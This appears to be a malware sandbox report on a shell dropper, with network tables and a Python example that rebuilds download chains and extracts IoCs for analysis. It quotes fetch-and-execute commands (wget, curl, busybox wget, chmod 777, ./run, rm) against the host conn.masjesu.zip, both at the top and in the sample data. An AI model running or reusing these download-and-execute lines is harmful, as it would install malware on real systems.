[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 N/A udp
GB 185.125.188.61:443 N/A tcp
GB 185.125.188.62:443 N/A tcp
US 151.101.1.91:443 N/A tcp
US 151.101.1.91:443 N/A tcp
GB 195.181.164.14:443 N/A tcp

Files

N/A
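The process listings above, for both the debian9-armhf run (behavioral2) and the ubuntu1804-amd64 run (behavioral1), follow one loop: for each name under /bins/ on conn.masjesu.zip the script tries wget, curl and busybox wget, then chmod 777, executes the file and deletes it. In behavioral2 the whole chain runs for every name; in behavioral1 only the wget and curl stages appear and the Network table shows no TCP connection to the two 87.120.x.x hosts. The Python below is an added example, not part of this report or of the sandbox's own tooling: it parses a handful of lines copied from these tables (constructed sample, reduced to two artifacts so it runs offline), reconstructs the per-artifact fetch/chmod/execute/delete chain, flags chains that stop early, and pulls out the URLs, hosts and TCP destinations as IoCs. The stage names, the "[...]" command-line format and the four-column network row format are assumptions taken from how the report prints its data.

```python
"""Reconstruct the download chain and IoCs from a sandbox report's process
and network listings. Added example; sample rows are copied from the report
above and trimmed to two artifacts (constructed input, not a live fetch)."""
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample: behavioral2 command lines, full chain for two names.
BEHAVIORAL2_CMDS = """
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
[/bin/rm bins.sh]
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
"""

# Constructed sample: behavioral1 command lines, chain stops after curl.
BEHAVIORAL1_CMDS = """
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
[/bin/rm bins.sh]
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
"""

# Constructed sample: a few rows of the behavioral2 Network table.
NETWORK_ROWS = """
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
"""

CMD_RE = re.compile(r"^\[(.*)\]$")
STAGES = ("download", "chmod777", "execute", "delete")  # assumed stage names


def classify(cmd):
    """Map one command line to (stage, artifact, url); None if it is not
    part of the fetch -> chmod 777 -> execute -> rm chain."""
    argv = cmd.split()
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "busybox" and len(argv) > 1:  # "/bin/busybox wget URL"
        argv = argv[1:]
        prog = argv[0]
    if prog in ("wget", "curl"):
        urls = [a for a in argv if a.startswith(("http://", "https://"))]
        if urls:
            return ("download", urls[0].rsplit("/", 1)[-1], urls[0])
    if prog == "chmod" and len(argv) == 3 and argv[1] == "777":
        return ("chmod777", argv[2], None)
    if prog == "rm" and len(argv) == 2:
        return ("delete", argv[1], None)
    if len(argv) == 1 and argv[0].startswith("./"):
        return ("execute", argv[0][2:], None)
    return None


def reconstruct_chains(listing):
    """Group classified commands by artifact name and record which stages
    were observed; 'complete' is True only when all four stages are present."""
    chains = {}
    for line in listing.strip().splitlines():
        m = CMD_RE.match(line.strip())
        hit = classify(m.group(1)) if m else None
        if hit is None:
            continue
        stage, artifact, url = hit
        entry = chains.setdefault(artifact, {"stages": set(), "urls": set()})
        entry["stages"].add(stage)
        if url:
            entry["urls"].add(url)
    for entry in chains.values():
        entry["complete"] = all(s in entry["stages"] for s in STAGES)
    return chains


def iocs(listing):
    """Download URLs, hosts and fetched artifact names from a process listing."""
    chains = reconstruct_chains(listing)
    urls = sorted(u for c in chains.values() for u in c["urls"])
    return {"urls": urls,
            "hosts": sorted({urlparse(u).hostname for u in urls}),
            "artifacts": sorted(a for a, c in chains.items() if c["urls"])}


def summarize_network(rows):
    """Count TCP destinations (ip:port) with their country label and the
    resolver lookups per domain from the report's Network table."""
    tcp, dns, country = Counter(), Counter(), {}
    for line in rows.strip().splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        cc, dest, domain, proto = parts
        if proto == "tcp":
            tcp[dest] += 1
            country[dest] = cc
        elif proto == "udp" and dest.endswith(":53"):
            dns[domain] += 1
    return {"tcp": dict(tcp), "country": country, "dns": dict(dns)}


if __name__ == "__main__":
    for name, listing in (("behavioral2", BEHAVIORAL2_CMDS), ("behavioral1", BEHAVIORAL1_CMDS)):
        for artifact, c in reconstruct_chains(listing).items():
            if c["urls"]:
                print(name, artifact, sorted(c["stages"]), "complete" if c["complete"] else "INCOMPLETE")
    print(iocs(BEHAVIORAL2_CMDS)["hosts"], summarize_network(NETWORK_ROWS)["tcp"])
```

Run against the full tables, the same functions give the complete list of /bins/ names and show the fetch host resolving alternately to the BG and DE addresses; an incomplete chain, as in behavioral1, is the signal that a payload did not run on that platform, not that the host is clean.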